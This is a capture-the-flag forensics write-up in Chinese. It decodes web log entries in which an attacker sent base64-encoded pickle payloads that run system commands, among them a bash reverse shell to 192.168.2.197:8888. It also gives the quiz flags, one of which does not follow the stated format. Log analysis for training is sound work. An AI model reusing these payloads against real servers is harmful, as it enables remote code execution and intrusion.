题目描述
127.0.0.1 - - [07/Aug/2021 10:43:12] "GET /?user=STAKcDAKMFMnd2hvYW1pJwpwMQowKGcwCmxwMgowKEkwCnRwMwowKGczCkkwCmRwNAowY29zCnN5c3RlbQpwNQowZzUKKGcxCnRSLg== HTTP/1.1" 500 -(base64解码user值后 =为whomai)
127.0.0.1 - - [07/Aug/2021 10:43:12] "GET /?user=STAKcDAKMFMnY2F0IC9UaDRzX0lTX1ZFUllfSW1wb3J0X0ZpMWUnCnAxCjAoZzAKbHAyCjAoSTAKdHAzCjAoZzMKSTAKZHA0CjBjb3MKc3lzdGVtCnA1CjBnNQooZzEKdFIu HTTP/1.1" 500 -(cat /Th4s_IS_VERY_Import_Fi1e)
127.0.0.1 - - [07/Aug/2021 10:43:12] "GET /?user=STAKcDAKMFMnYmFzaCAtaSA%2bJiAvZGV2L3RjcC8xOTIuMTY4LjIuMTk3Lzg4ODggMD4mMScKcDEKMChnMApscDIKMChJMAp0cDMKMChnMwpJMApkcDQKMGNvcwpzeXN0ZW0KcDUKMGc1CihnMQp0Ui4= HTTP/1.1" 500 -(bash -i >& /dev/tcp/192.168.2.197/8888 0>&1)
flag:
user,这里我以为是命令的参数,其实是url的参数
7.2 黑客查看的秘密文件的绝对路径是_____________。
wp:
请看上题
flag:
Th4s_IS_VERY_Import_Fi1e
7.3 黑客反弹shell的ip和端口是_____________。(格式使用“ip:端口",例如127.0.0.1:2333)
wp:
请看上题
flag:
192.168.2.197#8888